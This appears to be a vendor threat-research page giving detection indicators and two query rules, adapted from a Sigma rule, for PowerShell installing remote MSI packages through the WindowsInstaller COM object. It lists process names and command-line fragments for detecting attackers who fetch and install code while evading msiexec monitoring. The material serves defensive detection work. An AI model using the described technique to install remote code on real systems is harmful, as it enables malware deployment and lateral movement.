PowerShell MSI Install Via WindowsInstaller COM From Remote Location

    Date: 06/26/2025

    Severity: Medium

    Summary

    PowerShell MSI Install Via WindowsInstaller COM From Remote Location refers to the use of PowerShell to install MSI files through the WindowsInstaller.Installer COM object, especially when the files are hosted remotely. This technique may be used by attackers to deploy malware or move laterally while avoiding detection tools that monitor standard installation methods like msiexec.

    Indicators of Compromise (IOC) List 

    Image

    '\powershell_ise.exe'

    '\powershell.exe'

    '\pwsh.exe'

    OriginalFileName

    'PowerShell_ISE.EXE'

    'PowerShell.EXE'

    'pwsh.dll'

    CommandLine

    '-ComObject'

    'InstallProduct('

    'http'

    '\\\\'

    '://127.0.0.1'

    '://localhost'

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1 : 

    ((resourcename = "Windows Security"  AND eventtype = "4688") AND (processname like "PowerShell_ISE.EXE" OR processname like "PowerShell.EXE" OR processname like "pwsh.dll") AND (commandline not like "://127.0.0.1" AND commandline not like "://localhost") AND (commandline like "-ComObject" AND commandline like "InstallProduct(") AND (commandline like "http" OR commandline like "\\\\") )

    Detection Query 2 : 

    technologygroup = "EDR" AND (processname like "PowerShell_ISE.EXE" OR processname like "PowerShell.EXE" OR processname like "pwsh.dll") AND (commandline not like "://127.0.0.1" AND commandline not like "://localhost") AND (commandline like "-ComObject" AND commandline like "InstallProduct(") AND (commandline like "http" OR commandline like "\\\\") 

    Reference:    

    https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_powershell_comobject_msi_remote.yml


    Tags

    SigmaPowerShell Attack

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags